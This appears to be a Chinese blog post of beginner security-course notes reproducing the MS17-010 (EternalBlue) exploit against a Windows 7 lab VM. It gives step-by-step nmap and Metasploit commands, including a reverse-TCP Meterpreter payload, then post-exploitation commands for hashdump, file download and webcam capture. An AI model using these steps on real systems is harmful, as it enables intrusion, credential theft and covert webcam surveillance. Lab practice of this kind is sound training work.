网络安全Day01笔记

最新推荐文章于 2024-08-07 15:41:06 发布
最新推荐文章于 2024-08-07 15:41:06 发布
阅读量42 收藏
点赞数
文章标签: web安全 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/isolaterxu/article/details/133826037
版权

渗透测试基础实战

实例: MS17-010
软件:Vmware Workstation 17
攻击机:Kali 靶机环境:Win7

简要介绍:

 是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

复现步骤:

步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (攻击机与靶机注要保持同一网段 使用NAT,看相互是否ping通)
在这里插入图片描述

全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24

步骤2:启动msf(metasploit) 命令为msfconsole
在这里插入图片描述
查看必备参数是否填写完。
在这里插入图片描述

看到 RHOSTS(攻击目标)空缺
在这里插入图片描述

设置攻击目标并且看是否有MS17-010目标

步骤3 搜索漏洞 命令为:search ms17-010
在这里插入图片描述

步骤4 使用序号为1的攻击模块
命令:use 0
在这里插入图片描述

步骤5 查看设置攻击负载
因为 no payload 所以要设置攻击负载
查看 设置攻击负载
在这里插入图片描述

命令:set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

步骤6 设置受害者IP
命令:set rhost
步骤7 设置攻击者IP
命令:set lhost
在这里插入图片描述

输入run进行攻击 结果会显示WIN,表示拿到权限
在这里插入图片描述

拿到主机shell,发现会存在一定乱码,是编码的问题
在这里插入图片描述

使用命令chcp 65001
补充:
936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8
在这里插入图片描述

步骤8 屏幕快照
在这里插入图片描述

上传到C盘
在这里插入图片描述

看到快照了
在这里插入图片描述

从目标机中下载文件
在这里插入图片描述

命令 getuid——查看权限,为管理员
在这里插入图片描述

hashdump获取密码md5码
在这里插入图片描述
在这里插入图片描述

其他命令:
webcam_list ——查看摄像头
webcam_snap——通过摄像头拍照
webcam_stream——通过摄像头开启视频

isolater-徐熠明
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
【千峰】网络安全学习笔记
chenjyboke的博客
12-03 1225
一OSI TCP,IP协议簇 1.分层模型 (同层使用相同的协议, 下层为上层提供服务) 通信需求---->定义协议标准 含义:将复杂的流程分解为几个功能相对单一的过程 目的:1.整个流程更加清晰,将复杂化的问题简单化。 2.更容易发现问题并针对性的解决问题。 (1)分层思想 (2)OSL参考模型 (3)TCP/IP协议簇 应用层 传输层 网络层 数据链接层 物理层 2. 数据传输过程 数据封装与解封装过程 ...
网络安全工程师(千峰教育)笔记
11-03
b站的千峰老师的网络安全工程师的系列课程的笔记,自己整理的,pdf版本,内容包含day2--------day24。
网络安全学习笔记Day01—Day10
u014136101的博客
07-15 1729
①数据库(DB)是按照统一格式存放在一起的数据,作为企业管理系统的后台一台服务器可以部署多个数据库一个数据库可以包含多张表(用来存储具体的数据,由“记录”和“字段”组成)一个表中包含多条记录(行=“记录”)一条记录包含多个字段(列=“字段”)②数据管理员(DBA)③数据库的管理系统(DBMS)维护数据库并有效的访问数据库的各部分数据(增、删、改、查)④常见的数据库管理系统正向解析名字>>>IP反向解析IP>>>名字②早期域名解析方法C③常见的顶级域名(一级)组织域。...
网络安全学习笔记Day1
Leo__ch的博客
01-07 586
第一节 Leo:网络并非法外之地。网络安全需要你我维护,切不可触碰非法领域。 域名 什么是域名? 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)。 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器
网络安全笔记day01(1)
2401_84302816的博客
04-27 888
3、在虚拟网络编辑器中把vmnet0 交换机和真实网卡Intel WiFi网卡连接。2、选择vmnet0网卡(桥接网卡),这步的意思就是将虚拟机的网卡连接到vmnet0交换机上。4、虚拟机网络配置设置为自动模式,ipconfig /renew,重新获取ip地址等参数。1、在没有用虚拟机的时候,物理机网卡直接连接无线路由器。slmgr /skms kms服务器 常用:kms.03k.org。1、设置-windows安全中心-defender。2、控制面板-Windows 防火墙。
网络安全笔记-day6,NTFS安全权限
欢迎大家,一起努力!
03-21 1798
文件权限权限内容完全控制读取,写入,修改,删除,特殊文件修改读取,写入,修改,删除读取和执行读取,执行,下载读取读取写入写入特殊权限控制文件权限文件夹权限权限内容完全控制读取,写入,修改,删除,特殊文件修改读取,写入,修改,删除读取和执行读取,执行,下载读取读取写入写入特殊权限控制文件权限大概就是这样当用户属于不同组是,权限是可以累加的,当允许碰到拒绝,拒绝优先级最高!
网络安全笔记整理
2401_84302816的博客
04-27 1001
4.0day漏洞:通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞,(1day、nday:0day漏洞公开后,便称为nday漏洞)5.后门:后门是一种用于获得对程序或在线服务访问权限的秘密方式。(绕过安全控制而获取对程序或系统访问权的方法)6.WEBSHELL:以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称作为一种网页后门(
网络安全笔记(Day4)
gentle、待人的博客
05-31 2005
目标: 1.NTFS安全权限 2.文件共享服务器
网络安全温晓飞老师的课12day 笔记
Breeno16的博客
05-04 3184
数据链路层(2层 Data Link Layer) 1.属于2层 2.传输单元:帧 3.帧结构 帧头包含:目标MAC 源MAC 类型 (6字节)(6字节)(2字节) 帧头类型两种: 0x0800:上层为IP协议 0x代表16进制 0x0801: 上层为ARP协议 帧格式: 802.3 802.11 ...
网络安全笔记
qq_46648283的博客
04-27 473
一、安装pikachu时,若是出现站点搭建成功,却无法登录时: (1)通过端口查询,看端口是否被占用。win+r---cmd---nestat -a 会显示所有的端口使用状态。 接着在phpstudy中修改,端口号。 二、若虚拟机中的pikachu成功访问,本机却无法访问时: (1)改变访问路径:虚拟机的IP地址+端口号+想要访问的文件(pikachu) day1: (1)安装Tomcat: 安装tomcat之前,需要安装jdk。 配置环境变量: 新建环境变量:JAVA_HOME:找到放置
笔记day01.docx
09-10
而C语言则是面向过程的,侧重于通过结构化的代码块实现功能,这在大型项目中可能导致数据安全性和代码复用性的不足。 【C++的优势】 1. 底层开发能力:C++允许开发者更接近硬件,适用于需要高效性能的场景。 2. ...
内网学习入门笔记day03
07-11
### 内网学习入门笔记day03:活动目录与内网安全管理 #### 一、活动目录(Active Directory,AD)概述 活动目录是微软开发的一种目录服务,它为Windows域网络提供了一种集中管理和存储信息的方式。在企业环境中,...
贝加莱培训笔记DAY5第五天
11-22
【贝加莱培训笔记DAY5第五天】 在第五天的贝加莱培训中,主要讨论了贝加莱自动化系统中的AsIMA(Automation Studio Industrial Middleware Architecture)及其相关通讯配置。AsIMA是贝加莱自动化环境中用于不同设备...
Day01.zip
04-28
总的来说,"Day01.zip"这类压缩文件是IT知识和实践中的基本元素,涉及到文件管理、数据传输、网络安全等多个方面。无论是学习新技能还是日常工作中,理解和掌握如何有效地利用这种文件格式都是至关重要的。
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
最新发布
lurenjia404的博客
08-07 744
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 976
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 342
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1460
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

isolater-徐熠明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值